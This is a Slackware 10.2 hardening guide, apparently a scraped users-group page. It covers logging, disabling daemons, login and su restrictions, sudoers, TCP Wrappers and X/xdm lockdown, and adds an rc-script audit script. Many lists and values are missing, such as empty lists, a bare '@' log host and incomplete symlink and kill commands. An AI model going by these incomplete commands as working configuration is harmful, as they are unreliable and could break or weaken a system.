Cochise Linux Users Group

Slackware System Hardening
Copyright (c) 2002, 2005, 2006 Jeffrey Denton

Written by Jeffrey Denton <> 2 September 2006
Version - 0.7.1

This is written for:

$ cat /etc/slackware-version
Slackware 10.2.0

This is a list of some of the steps I take to improve the security on my Slackware systems. It is by no means a complete list of everything that is possible. You can either do all of the things listed here, or you can choose the ones you feel would help secure your system.

WARNING:    Hardening a system is a compromise between security
            and usability.  Some of the things I do would adversely
            affect the usability of your system and may very well
            break things.  Please have one of the following on hand
            just in case you lock yourself out of your system:
                Tom's Rootboot -
                The "Live" CD that comes with the official
                version of Slackware
                The Slackware Install CDs
            You should make a backup of anything that you feel is
            important, would be hard to replace, or that you simply
            could not do without BEFORE implementing anything listed
            here.
            If you don't understand what a setting or configuration
            is doing, don't use it on your system.
            The contents of this document are only meant to be used
            on Slackware Linux.
            Some of the settings are redundant (defense in depth) or
            may conflict.
            You have been warned.
  • The settings assume that only one user is on the system, "dentonj";
    adjust as necessary.
  • Associated man pages are listed for further information.
  • I will comment this document if I ever get around to it.
  • This is still a draft as there are many TODO items.

----[ Keep Current ]----

    To subscribe to the Slackware Security mailing list, email:

    with the phrase "subscribe slackware-security" in the body of the email.

----[ Logging ]----


    In /etc/rc.d/rc.syslog:

    /usr/sbin/syslogd -m 10 -r -h
    /usr/sbin/klogd -c 3 -x -p

    root@darkstar:~# /etc/rc.d/rc.syslog restart

    The "-m 10" option makes syslogd write a "-- MARK --" line every 10
    minutes, so a log that has stopped growing can be told apart from a
    quiet system. The "-r" option enables the system to receive syslog
    messages from remote hosts. The "-h" option allows syslog to forward
    messages it receives from remote hosts. This allows syslog messages to
    be logged on several systems for redundancy. Syslog messages that are
    sent over the network are neither encrypted nor authenticated and can
    be easily captured or forged, so if you use "-r", restrict who can
    reach UDP port 514 with a packet filter. Watch out for syslog
    forwarding loops when using both "-r" and "-h".

    For klogd, "-c 3" limits console output to messages more urgent than
    "err", "-x" skips EIP-to-symbol translation (so System.map is not
    read), and "-p" enables paranoia mode, which reloads the kernel symbol
    table when an Oops is seen.

    Opens UDP port 514 (only when "-r" is used).

    man syslogd
    man klogd


    In /etc/syslog.conf (the leading "-" on a file name turns off the
    fsync after every write; it must be attached to the path):

    # Log everything to a file
    *.*                         -/var/log/messages

    # Log everything to a tty (Ctrl-Alt-F12)
    *.*                         /dev/tty12

    # Log everything to a log host
    *.*                         @

    # Display emergencies to everyone using wall
    *.=emerg                    *

    # Send alerts directly to the user's terminals
    *.=alert                    root,dentonj

    root@darkstar:~# /etc/rc.d/rc.syslog restart

    man syslogd
    man syslog.conf

    In /etc/logrotate.conf:

    rotate 26

    With the default weekly rotation, keeping 26 old logs means 6 months
    worth of logs. Make sure you have enough hard drive space to store
    them. You really should be moving the logs off of the system.

    man logrotate


    In /etc/logrotate.d/syslog ("create 0640 root root" makes the new log
    file unreadable by ordinary users after each rotation):

    /var/log/cron /var/log/debug /var/log/maillog /var/log/messages
    /var/log/secure /var/log/spooler /var/log/sulog /var/log/syslog {
        create 0640 root root
        postrotate
            /bin/kill -HUP `cat /var/run/ \
            2> /dev/null || true`
        endscript
    }


    man logrotate


    In /etc/rc.d/rc.M, comment out the lines that rewrite /etc/motd at
    every boot; otherwise the banner below is overwritten with the kernel
    version:

    # Setup the /etc/motd to reflect the current kernel level:
    # echo "$(/bin/uname -sr)." > /etc/motd

    man motd

/etc/motd, /etc/, /boot/boot_message.txt:

    Unauthorized access prohibited; all access and activities not
    explicitly authorized by the administrator are unauthorized.
    All activities are monitored and logged. There is no privacy
    on this system. Unauthorized access and activities or any
    criminal activity will be reported to appropriate authorities.


"You seem to be lost. Please return to your little corner of the Internet."

    root@darkstar:~# lilo -v -p

    If lilo returns an error, try to determine what the problem is and rerun
    lilo before you reboot the system. Otherwise, you may end up with a
    system that doesn't boot properly.

    man issue
    man motd

    # Log icmp packets to syslog
    /usr/sbin/icmpinfo -vvv -s -l

    man icmpinfo


    Process accounting is turned on by /etc/rc.d/rc.M, but only if the log
    file it writes to already exists, so it silently stays off until you
    create it:

    root@darkstar:~# touch /var/log/pacct

    man ac
    man 2 acct
    man 5 acct
    man accton
    man sa
    man lastcomm

    Increase logging in cron. crond is started from /etc/rc.d/rc.M; change
    the "-l" level on its command line there:

    /usr/sbin/crond -l7 >> /var/log/cron 2>&1

    man crond

    The btmp log file records failed login attempts; the command lastb
    lists its contents. login only writes to btmp if the file already
    exists:

    root@darkstar:~# touch /var/log/btmp
    root@darkstar:~# chown --reference=/var/log/wtmp /var/log/btmp
    root@darkstar:~# chmod 600 /var/log/btmp
    root@darkstar:~# ln -s /usr/bin/last /usr/bin/lastb
    root@darkstar:~# lastb

    Users that try to login by entering their password first (at the
    "login:" prompt) will end up with it being logged in /var/log/btmp as
    a failed user name and displayed by lastb. That is why btmp must not be
    world-readable: wtmp normally is, so do not copy its mode with
    "chmod --reference".

    man last

----[ Disable Daemons/Close Ports ]----


    In /etc/inetd.conf, the following are running by default:

      time - TCP port 37
      time - UDP port 37
      auth - TCP port 113
      comsat - UDP port 512

    Comment out the lines of the services that you don't need, then list
    what is still enabled and restart inetd:

    root@darkstar:~# grep -v "^#" /etc/inetd.conf
    root@darkstar:~# /etc/rc.d/rc.inetd restart

    man inetd
    man in.comsat
    man in.identd
    man grep

    If nothing in inetd.conf is needed, stop inetd altogether:

    root@darkstar:~# /etc/rc.d/rc.inetd stop
    root@darkstar:~# chmod a-x /etc/rc.d/rc.inetd

    man inetd
    man chmod

    In /usr/X11R6/bin/startx:

    defaultserverargs="-nolisten tcp"

    Closes TCP port 6000+n, where n is the display number (the default is 0).

    man Xserver

    In /etc/X11/xdm/Xservers:

    :0 local /usr/X11R6/bin/X -nolisten tcp

    Closes TCP port 6000.

    man Xserver
    man xdm

    In /etc/X11/xdm/Xaccess, make sure everything is commented out, so that
    no host can request a login window or a chooser over XDMCP.

    man xdm

    In /etc/rc.d/rc.4:

    exec /usr/X11R6/bin/xdm -nodaemon -udpPort 0

    Closes UDP port 177.

    man xdm

    In /etc/X11/fs/config (the X font server):

    use-syslog = yes
    no-listen = tcp

    Closes TCP port 7100.

    man xfs

    Most of the rc scripts are started here. From the script:

        "Uncomment or comment out sections depending on which
        services your site requires."

    There are two ways to stop daemons and services from being started. The
    first way is to make the script starting the daemon or service
    non-executable, since each stanza only runs the script if the "-x" test
    succeeds:

        chmod 600 /etc/rc.d/rc.bind

    The second way is to comment out the section of this script that starts
    the daemon or service:

    Lines 100-103:

        # Start the BIND name server daemon:
        # if [ -x /etc/rc.d/rc.bind ]; then
        #   /etc/rc.d/rc.bind start
        # fi

    Or you can do both. Using both methods is redundant. However, using both
    methods would keep daemons from accidentally being started at the next
    reboot if you happen to get sloppy with a chmod command. Some daemons will
    not start by default because their configuration files are either not
    present or not setup properly.
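    The two conditions above (executable bit and an uncommented stanza) are
    easy to get out of sync. As an added example that is not part of the
    original page, the POSIX sh script below applies both checks to a
    directory of rc scripts and reports which services would start. The rc
    scripts and the rc.M excerpt it audits are constructed inside the script
    under a temporary directory, and the names will_start, audit_rcd and
    build_sample are this example's own. To audit a live box, call
    will_start /etc/rc.d/rc.bind /etc/rc.d/rc.M (or audit_rcd /etc/rc.d
    /etc/rc.d/rc.M) instead of the fixture.

```shell
#!/bin/sh
# Added example, not from the original page: check whether a Slackware rc
# script will actually be started at boot. Two things must both be true:
# the script is executable, and the stanza in rc.M (or rc.inet2) that calls
# it is not commented out.

# will_start <rc_script> <rc_m_file>
# Prints "start: NAME" or "skip: NAME <reason>"; returns 0 only for "start".
will_start() {
    script=$1
    rcm=$2
    name=$(basename "$script")
    if [ ! -x "$script" ]; then
        echo "skip: $name is not executable"
        return 1
    fi
    # Drop comment lines, then look for the call "/etc/rc.d/NAME start".
    if grep -v '^[[:space:]]*#' "$rcm" | grep -q "/etc/rc.d/$name start"; then
        echo "start: $name"
        return 0
    fi
    echo "skip: $name call is commented out in $(basename "$rcm")"
    return 1
}

# audit_rcd <rc.d directory> <rc_m_file>: run will_start over every rc.* file,
# skipping the master scripts and *.conf files that are never "started".
audit_rcd() {
    for s in "$1"/rc.*; do
        case $(basename "$s") in
            rc.M|rc.S|rc.K|rc.inet2|rc.local|rc.*.conf) continue ;;
        esac
        will_start "$s" "$2" || true
    done
}

# build_sample: constructed test fixture (not a real system). Creates a
# temporary rc.d with three scripts and a short rc.M excerpt, prints its path.
build_sample() {
    d=$(mktemp -d)
    cat > "$d/rc.M" <<'EOF'
# Start the BIND name server daemon:
# if [ -x /etc/rc.d/rc.bind ]; then
#   /etc/rc.d/rc.bind start
# fi

# Start the Apache web server:
# if [ -x /etc/rc.d/rc.httpd ]; then
#   /etc/rc.d/rc.httpd start
# fi

# Start the OpenSSH SSH daemon:
if [ -x /etc/rc.d/rc.sshd ]; then
  /etc/rc.d/rc.sshd start
fi
EOF
    for s in rc.bind rc.httpd rc.sshd; do
        printf '#!/bin/sh\necho %s\n' "$s" > "$d/$s"
    done
    chmod 600 "$d/rc.bind"    # disabled with chmod (method one)
    chmod 755 "$d/rc.httpd"   # executable, but its rc.M stanza is commented out
    chmod 755 "$d/rc.sshd"    # executable and called: this one starts
    echo "$d"
}

# Demo run against the constructed fixture.
sample=$(build_sample)
audit_rcd "$sample" "$sample/rc.M"
rm -rf "$sample"
```

    On the fixture this prints one "skip" line for rc.bind (not executable),
    one for rc.httpd (stanza commented out) and "start: rc.sshd".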

    Comment out the following lines:

    Lines 20 - 53: Disable mounting of NFS filesystems
    Lines 58 - 60: Disable RPC portmapper
    Lines 63 - 68: Disable mount of SMB filesystems
    Lines 90 - 92: Disable inetd
    Lines 101 - 103: Disable BIND
    Lines 106 - 108: Disable NIS
    Lines 115 - 117: Disable NFS

    Comment out the following lines:     

    Lines 103 - 105: Disable dnsmasq
    Lines 108 - 114: Disable CUPS and lpd
    Lines 117 - 119: Disable netatalk
    Lines 160 - 162: Disable atd
    Lines 194 - 196: Disable saslauthd
    Lines 199 - 201: Disable sendmail
    Lines 205 - 212: Disable APM and ACPI
    Lines 230 - 232: Disable HP Officejet
    Lines 235 - 237: Disable MySQL
    Lines 240 - 242: Disable Apache
    Lines 224 - 226: Disable Samba
    Lines 234 - 236: Disable SystemV init scripts

    Comment out the following lines:

    Lines 16 - 22: Disable hotplug
    Lines 39 - 43: Disable udev
    Lines 192 - 196: Disable isapnp
    Lines 292 - 294: Disable SystemV init scripts

    Advanced Configuration and Power Interface event daemon

    root@darkstar:~# /etc/rc.d/rc.acpid stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.acpid

    This daemon doesn't open any ports.

    Advanced Linux Sound Architecture

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.alsa

    This daemon doesn't open any ports.


    Netatalk (AppleTalk file and print services)

    root@darkstar:~# /etc/rc.d/rc.atalk stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.atalk

    Closes TCP port 548.


    The BIND name server

    root@darkstar:~# /etc/rc.d/rc.bind stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.bind

    Closes TCP ports 53 and 953.
    Closes UDP ports 53 and 32768.

    Common UNIX Printing System

    root@darkstar:~# /etc/rc.d/rc.cups stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.cups

    Closes TCP and UDP port 631.

    A lightweight DHCP and caching DNS server

    root@darkstar:~# /etc/rc.d/rc.dnsmasq stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.dnsmasq

    Closes TCP and UDP port 53.

    General Purpose Mouse

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.gpm

    This daemon doesn't open any ports.

    Linux hotplugging support scripts

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.hotplug

    This daemon doesn't open any ports.

    Apache webserver

    root@darkstar:~# /etc/rc.d/rc.httpd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.httpd

    Closes TCP port 80.

    Configures network interfaces

    Make any changes in /etc/rc.d/rc.inet1.conf.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.inet1

    The Internet daemon

    root@darkstar:~# /etc/rc.d/rc.inetd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.inetd

    Closes TCP ports 37 and 113 (by default).
    Closes UDP ports 37 and 512 (by default).

    The MySQL server daemon

    By default, mysqld will not start. Read the /etc/rc.d/rc.mysqld file for
    details on how to start the daemon.

    The script prevents incoming network connections by default with the
    "--skip-networking" option. If this option is commented out, TCP port
    3306 will be opened.

    This daemon doesn't open any ports by default.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.mysqld

    The knfsd NFS daemon

    By default, the daemon will not start because the file /etc/exports is
    not configured properly.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.nfsd

    The RPC portmapper

    This script is started by /etc/rc.d/rc.nfsd. Since the file /etc/exports
    is not configured properly by default, this daemon will not start.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.portmap

    The Samba SMB file/print server

    By default, the daemon will not start because the file /etc/samba/smb.conf     is not present.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.samba

    The Cyrus SASL authentication daemon (saslauthd), which servers such as
    sendmail use to check plaintext (PLAIN/LOGIN) credentials against the
    system's password database.

    root@darkstar:~# /etc/rc.d/rc.saslauthd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.saslauthd


    The sendmail mail transfer agent

    root@darkstar:~# /etc/rc.d/rc.sendmail stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail

    Closes TCP ports 25 and 587.

    The Secure Shell Server

    root@darkstar:~# /etc/rc.d/rc.sshd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.sshd

    Closes TCP port 22.

    The system logging daemon

    If the "-r" option is used, UDP port 514 is opened.

    This daemon doesn't open any ports by default.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.syslog

    "This file provides basic compatibility with SystemV style startup scripts."

    Unless you have installed a daemon that requires the use of SystemV
    style startup scripts, there is no need for it to be executable.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.sysvinit

    "udev provides a dynamic device directory containing only the files for
    actually present devices. It creates and removes device node files
    usually located in the /dev directory."

    This is part of the hotplug subsystem.

    This daemon doesn't open any ports.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.udev

    man udev

    This file holds the configuration settings used by /etc/rc.d/rc.wireless.
    The file may hold encryption keys in plain text. Make sure that users
    are not able read this file (the default setting).

    root@darkstar:~# chmod 600 /etc/rc.d/rc.wireless.conf

    The Network Information Service

    The contents of this file is commented out by default.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.yp

----[ Limit Access ]----

    chmod 1733 /tmp /var/tmp

    Prevents users from looking at the contents of those directories. It
    still allows them to create, access, and modify files in those
    directories if they know the actual file name. This does not stop users
    from running executables in /tmp.

    dentonj@darkstar:~$ ls -ld /tmp
    drwx-wx-wt 5 root root 4096 2001-06-27 12:54 /tmp/
    dentonj@darkstar:~$ cp /bin/date /tmp/test
    dentonj@darkstar:~$ /tmp/test
    Thu Jun 27 12:55:00 MST 2001
    dentonj@darkstar:~$ ls /tmp
    ls: /tmp: Permission denied

    man chmod

    chmod 1733 /tmp/.ICE-unix
    chmod 1733 /tmp/.X11-unix

    Don't let everyone have read access to utmp. Note that who, w and
    finger then stop working for users who are not in the utmp group:

    chmod 660 /var/run/utmp

    man utmp
    man chmod

    In /etc/lilo.conf:

    password=""
    # mandatory - enter a password with every boot
    # restricted - enter a password only when a boot time parameter
    # is used (e.g. - "linux single")
    # Pick one
    mandatory
    #restricted

    # Use the "-p" option with the lilo command to store the hashed password
    # in a separate file

    menu-title="Unauthorized Access Prohibited"
    message=/boot/boot_message.txt

    root@darkstar:~# lilo -v -p
    root@darkstar:~# chmod go-rwx /etc/lilo.conf

    Using the setting 'password=""' and then the '-p' option with lilo will
    prompt you to enter a pass phrase while lilo is running. The pass phrase
    is hashed and stored in /etc/lilo.conf.shs. The man page for lilo claims
    that the hashed pass phrase is stored in /etc/lilo.conf.crc. Either way,
    it's better than having the password listed in /etc/lilo.conf in plain
    text. The configuration options above will require the password to be
    entered whenever the system boots. You may not want to use the "mandatory"
    setting if uptime is important or when you normally only access the system
    remotely. In these cases, use "restricted" instead.

    man lilo
    man lilo.conf

    In /etc/login.access:

    +:root dentonj:LOCAL
    -:ALL:ALL

    Only root and dentonj can login locally. login.access grants access
    when no rule matches, so the final "-:ALL:ALL" line is what actually
    denies everyone else; without it the "+" line changes nothing. This
    does not affect logging in via ssh.

    Error generated: "Login incorrect"

    man login.access


    In /etc/login.defs:

    FAIL_DELAY                  20
    DIALUPS_CHECK_ENAB          no
    LOG_UNKFAIL_ENAB            yes
    LOG_OK_LOGINS               yes
    SULOG_FILE                  /var/log/sulog
    ISSUE_FILE                  /etc/issue
    PASS_MAX_DAYS               90
    PASS_MIN_LEN                12
    CHFN_RESTRICT               frwh
    DEFAULT_HOME                no
    #NO_PASSWORD_CONSOLE        null
    GETPASS_ASTERISKS           5

    root@darkstar:~# touch /var/log/sulog     

    man login.defs
    man dpasswd




    root@darkstar:~# usermod -g users -G wheel dentonj
    root@darkstar:~# chmod go-rwx /etc/suauth

    Depending on which /etc/suauth rule you use, either only dentonj is
    allowed to switch users, or only members of the wheel group are.

    Error generated: "Access to su to that account DENIED."
                     "You are not authorized to su root"

    man suauth


    In /etc/porttime:

    tty1,tty2,tty3,tty4,tty5,tty6:root,dentonj:Al0000-2400
    *:*:

    root@darkstar:~# chmod go-rwx /etc/porttime

    The first field lists the ports (ttys), the second the users, and the
    third the times at which those users may login on those ports
    ("Al0000-2400" means all days, all hours). If the third field is empty,
    the user is not able to login, so the "*:*:" entry is a default deny
    rule to catch everyone not already listed.

    The daemon logoutd is normally run to enforce the login time
    restrictions listed in /etc/porttime, logging users out when their
    allowed time ends.

    Error generated: "Invalid login time"     

    man porttime


    Start logoutd at boot (for example from /etc/rc.d/rc.local):

    # Enforce login time restrictions set in /etc/porttime
    if [ -x /usr/sbin/logoutd ]; then
      /usr/sbin/logoutd
    fi

    man logoutd


    In /etc/limits:

    dentonj C0L1
    *       L0

    root@darkstar:~# chmod go-rwx /etc/limits

    "C0" disables core dumps for dentonj and "L1" allows that user one login
    at a time. The setting "* L0" is a default rule for anyone not
    previously listed. The number of logins permitted is set to zero, which
    means anyone not previously listed is not allowed to login. This does
    not affect root.

    Error generated: "Too many logins."

    man limits

    Allowing users to run different shells allows them to bypass any security
    restrictions set on their login shell.     

    Delete the following:


    root@darkstar:~# removepkg ash
    root@darkstar:~# removepkg ksh93
    root@darkstar:~# removepkg tcsh
    root@darkstar:~# removepkg zsh

    man shells

    root@darkstar:~# faillog -u dentonj -m 10
    root@darkstar:~# faillog -a

    Don't set faillog for root. This is one of the few settings that can
    actually stop root from logging in. Using faillog can cause a denial of
    service if the maximum number of failed logins is reached, since anyone
    who can reach a login prompt can lock the account. Use faillog with
    caution.

    Error generated: "Login incorrect"

    man faillog

    Delete unused accounts.

    root@darkstar:~# find / -user adm -ls
    root@darkstar:~# userdel adm

    Repeat for the following:


    The accounts "halt" and "shutdown" don't work by default. The account
    "sync" isn't needed.

        root@darkstar:~# su halt
        halt: must be superuser.
        root@darkstar:~# su shutdown
        shutdown: you must be root to do that!
        root@darkstar:~# userdel halt
        root@darkstar:~# userdel shutdown
        root@darkstar:~# userdel sync

    Add /bin/false as the shell to the following:


    Error generated: none; the login succeeds and drops straight back to
    the login prompt because /bin/false exits immediately:

                      darkstar login: test
                      Password: *************************
                      Linux 2.4.32
                      Last login: Wed Jun 27 20:23:42 -0700 2001 on tty2
                      No mail.
                      Welcome to Linux 2.4.32 (tty2)
                      darkstar login:

    Password aging:
        Note:  Don't use this if you like to make the /etc/passwd and the 
        /etc/shadow files immutable (chattr +i ...).  It gets ugly...  If you 
        let the password expire, you will not be able to login until you reset 
        the password.  But if the /etc/shadow file is immutable and cannot be 
        changed, then you will not be able to login.  To fix the problem, you 
        would have to boot tomsrtbt or a Linux boot CD, mount the hard drive 
        partition where /etc is located, and remove the immutable attribute 
        from /mnt/etc/shadow (chattr -i ...).
        root@darkstar:~# passwd -x 90 -w 7 root
        root@darkstar:~# passwd -x 90 -w 7 -i 30 dentonj

    Check the status of every account and the consistency of the password
    files:

    root@darkstar:~# for i in `awk -F: '{print $1}' /etc/passwd`; do
    > passwd -S $i
    > done
    root@darkstar:~# pwck

    man 1 passwd
    man 5 passwd
    man find
    man userdel
    man false
    man pwck

    root@darkstar:~# find / -group adm -ls
    root@darkstar:~# groupdel adm

    Repeat for the following:


    root@darkstar:~# grpck

    Removing accounts may leave a long list of files that no longer belong
    to any user or group. Note that find's "-o" binds looser than the
    implied "-a", so the two tests must be grouped; otherwise the action
    only applies to the "-nogroup" branch. If you are interested what the
    files are:

    root@darkstar:~# find / \( -nouser -o -nogroup \) -ls > unowned.out

    To change the ownership of the files:

    root@darkstar:~# find / \( -nouser -o -nogroup \) -exec chown root:root {} \;

    man group
    man find
    man groupdel
    man grpck
    man chown

    In /etc/sudoers (edit it with visudo, which checks the syntax before
    saving):

    Defaults    rootpw
    Defaults    !root_sudo
    Defaults    ignore_dot
    Defaults    tty_tickets
    Defaults    requiretty
    Defaults    path_info
    Defaults    noexec
    %wheel     ALL=(ALL)     ALL

    root@darkstar:~# groups dentonj
    root@darkstar:~# usermod -g users -G wheel dentonj

    There are a number of security concerns when allowing users to use
    sudo. Make sure you completely read the man pages for sudo and sudoers.

    There are generally two approaches when configuring sudo. The first is
    to allow the user to run any command. This is essentially giving them su
    access to root. If you are going to use the first approach, you should
    require the user to enter the root password every time they use sudo
    ("Defaults rootpw" above). Two passwords would then need to be entered
    to gain root access.

    The second approach to configuring sudo is to only allow a limited
    number of commands to be run. If you are going to use the second
    approach, there are a few commands that you don't want to allow the user
    to run. These commands can be abused to give the user full access to
    the system. "Defaults noexec" blocks the exec-based shell escapes
    (editors, pagers) but not commands that can read or write arbitrary
    files on their own. Make sure you don't add the following or those
    listed in the Shell Escapes section below to the /etc/sudoers file:


    This list should be much longer.

    man sudo
    man sudoers
    man visudo
    man groups
    man usermod     

    The /etc/ftpusers file lists accounts that are denied login to the
    local ftp server. Add the following:

    Add all system accounts that are present in /etc/passwd, and any other
    account that should never log in over ftp.

    man ftpusers

    In /etc/host.conf:

    nospoof on
    spoofalert on
    spoof warn

    man host.conf

    TCP Wrappers

    In /etc/hosts.allow (rules are tried in order and the search stops at
    the first match, so the catch-all deny lines come last):

    all:local:banners /etc/banners:allow
    sshd:192.168.1.:banners /etc/banners:allow
    sendmail:all:banners /etc/banners:allow
    all:paranoid:spawn /usr/bin/logger "%d deny paranoid %c %p %a %h %u" \
        :banners /etc/banners:deny
    all:all:spawn /usr/bin/logger "%d deny %c %p %a %h %u" \
        :banners /etc/banners:deny

    From `man hosts_options`:

        banners /some/directory
               Look for a file in `/some/directory` with the same
               name as the daemon process (for example  in.telnetd
               for  the  telnet service), and copy its contents to
               the client.

    If you are using any of the services listed below, make sure you add an
    allow rule for it. If you want a different banner for a particular
    service, delete the symlink and create a text file with the same name.

    root@darkstar:~# mkdir /etc/banners && cd /etc/banners
    root@darkstar:/etc/banners# ln -s ../ afpd
    root@darkstar:/etc/banners# ln -s ../ imapd
    root@darkstar:/etc/banners# ln -s ../ in.identd
    root@darkstar:/etc/banners# ln -s ../ in.rexecd
    root@darkstar:/etc/banners# ln -s ../ in.rlogind
    root@darkstar:/etc/banners# ln -s ../ in.rshd
    root@darkstar:/etc/banners# ln -s ../ in.telnetd
    root@darkstar:/etc/banners# ln -s ../ popa3d
    root@darkstar:/etc/banners# ln -s ../ proftpd
    root@darkstar:/etc/banners# ln -s ../ sendmail
    root@darkstar:/etc/banners# ln -s ../ sshd
    root@darkstar:/etc/banners# ln -s ../ stunnel
    root@darkstar:/etc/banners# ln -s ../ vsftpd

    A command that can be used to determine which daemons use TCP Wrappers
    (the grep for "@$" relies on the "-F" in Slackware's default ls alias,
    which marks symlinks with "@"):

    root@darkstar:~# cd /usr/sbin; for i in `ls | grep -v "@$"`; do \
        echo " $i"; strings $i | grep hosts.allow; done | less

    To test the /etc/hosts.allow settings:

    root@darkstar:~# tcpdchk
    root@darkstar:~# tcpdmatch sshd localhost
    root@darkstar:~# tcpdmatch sshd
    root@darkstar:~# tcpdmatch sshd

    man tcpd
    man 5 hosts_access
    man hosts_options
    man tcpdchk
    man tcpdmatch


    In /etc/hosts.deny. The only time this file will match is when
    /etc/hosts.allow is misconfigured (for example, its final catch-all
    deny rule is missing):

    all:all:spawn /usr/bin/logger "Check hosts.allow - %d deny %c %p %a %h %u" \

        :banners /etc/banners:deny

    man tcpd
    man 5 hosts_access
    man hosts_options

    Modify /etc/X11/xdm/xdm-config and create Xstartup and Xreset so that
    entries can be added to utmp and wtmp when a user logs in.

    man xdm

    In /etc/X11/xdm/xdm-config:

    DisplayManager._0.startup:      /usr/X11R6/lib/X11/xdm/Xstartup
    DisplayManager._0.reset:        /usr/X11R6/lib/X11/xdm/Xreset
    DisplayManager*authorize:       true
    DisplayManager*authName:        XDM-AUTHORIZATION-1 MIT-MAGIC-COOKIE-1
    DisplayManager.requestPort:     0

    man xdm

    /etc/X11/xdm/Xstartup:

    #!/bin/sh
    # Xstartup
    # This program is run as root after the user is verified
    #
    # man xdm
    if [ -f /etc/nologin ]; then
        xmessage -file /etc/nologin -timeout 30 -center
        exit 1
    fi
    sessreg -a -l $DISPLAY -x /usr/X11R6/lib/X11/xdm/Xservers $LOGNAME
    /usr/X11R6/lib/X11/xdm/GiveConsole
    exit 0

    root@darkstar:~# chmod a+x /etc/X11/xdm/Xstartup


    /etc/X11/xdm/Xreset:

    #!/bin/sh
    # Xreset
    # This program is run as root after the session ends
    #
    # man xdm
    sessreg -d -l $DISPLAY -x /usr/X11R6/lib/X11/xdm/Xservers $LOGNAME
    /usr/X11R6/lib/X11/xdm/TakeConsole

    root@darkstar:~# chmod a+x /etc/X11/xdm/Xreset


    In /etc/X11/xdm/Xresources:

    xlogin*greeting:            Unauthorized Access Prohibited
    xlogin*allowRootLogin:      false
    xlogin*allowNullPasswd:     false

    man xdm

    In the X server's SecurityPolicy file (see man Xserver), comment the
    following lines. Each uncommented "property" line lets untrusted clients
    read or write that window property, so none should be enabled unless
    you need it:

    # If you are using Motif, you probably want these.
    #property _MOTIF_DEFAULT_BINDINGS root    ar iw
    #property _MOTIF_DRAG_WINDOW      root    ar iw
    #property _MOTIF_DRAG_TARGETS     any     ar iw
    #property _MOTIF_DRAG_ATOMS       any     ar iw
    #property _MOTIF_DRAG_ATOM_PAIRS  any     ar iw

    # If you are running CDE you also need these
    #property _MOTIF_WM_INFO         root    arw
    #property TT_SESSION             root    irw
    #property WM_ICON_SIZE           root    irw
    #property "SDT Pixel Set"        any     irw

    # The next two rules let xwininfo -tree work when untrusted.
    #property WM_NAME        any     ar

    # Allow read of WM_CLASS, but only for windows with WM_NAME.
    # This might be more restrictive than necessary, but demonstrates
    # the <required property> facility, and is also an attempt to
    # say "top level windows only."
    #property WM_CLASS     WM_NAME ar

    # These next three let xlsclients work untrusted. Think carefully
    # before including these; giving away the client machine name and command
    # may be exposing too much.
    #property WM_STATE                  WM_NAME ar
    #property WM_CLIENT_MACHINE         WM_NAME ar
    #property WM_COMMAND                WM_NAME ar

    # To let untrusted clients use the standard colormaps created by
    # xstdcmap, include these lines.
    #property RGB_DEFAULT_MAP root    ar
    #property RGB_BEST_MAP      root    ar
    #property RGB_RED_MAP       root    ar
    #property RGB_GREEN_MAP     root    ar
    #property RGB_BLUE_MAP      root    ar
    #property RGB_GRAY_MAP      root    ar

    # To let untrusted clients use the color management database created
    # by xcmsdb, include these lines.
    #property XDCCC_LINEAR_RGB_CORRECTION       root    ar
    #property XDCCC_LINEAR_RGB_MATRICES         root    ar
    #property XDCCC_GRAY_SCREENWHITEPOINT       root    ar
    #property XDCCC_GRAY_CORRECTION             root    ar

    # To let untrusted clients use the overlay visuals that many vendors
    # support, include this line.
    #property SERVER_OVERLAY_VISUALS    root    ar

    man Xserver

    Check that the X server is not open to everyone:

    dentonj@darkstar:~$ xhost
    access control enabled, only authorized clients can connect
    dentonj@darkstar:~$

    If the following line shows up:

    remove it with:

    dentonj@darkstar:~$ xhost -localhost

    man xhost
    man Xsecurity



    In /opt/kde/share/config/kdm/kdmrc:

    ServerArgsLocal=-nolisten tcp


    less /opt/kde/share/doc/kdm/README

    In /opt/kde/share/config/kdm/Xstartup, uncomment the following lines:

    chown $USER /dev/console
    exec sessreg -a -l $DISPLAY -h "`echo $DISPLAY | cut -d: -f1`" $USER

    In /opt/kde/share/config/kdm/Xreset, uncomment the following lines:

    chown root /dev/console
    chmod 622 /dev/console
    exec sessreg -d -l $DISPLAY -h "`echo $DISPLAY | cut -d: -f1`" $USER

    In Xaccess, comment out the following lines (the "*" entries are what
    let any host request a login window or chooser over XDMCP):

    #*                          #any host can get a login window
    #*   CHOOSER BROADCAST      #any indirect host can get a chooser

Access Control Lists:


    man acl
    man setfacl
    man getfacl

    In /etc/inittab, comment out the following line:

    #ca::ctrlaltdel:/sbin/shutdown -t5 -r now

    root@darkstar:~# telinit q


    I actually don't think this is necessary. But I'm including it because
    just about every security document on Linux recommends it. It stops anyone
    from being able to reboot the system by doing a three finger salute.
    Pressing Ctrl-Alt-Del to reboot the system only works if you have physical
    access to the system. Even if you disable this feature, it doesn't stop
    someone from pulling the power cord or pressing the reset switch to force a
    reboot. Most window managers trap Ctrl-Alt-Del anyways.

    The only time that I see disabling the above line as being useful is when
    you have a Windows admin using Linux. You don't want them rebooting the
    system every time they want to lock the system or go to the Task Manager.

    Or you can use /etc/shutdown.allow to control when (not exactly by who) the
    system can be rebooted with Ctrl-Alt-Del. There are security concerns with
    using this method. Check the man page for shutdown for details.


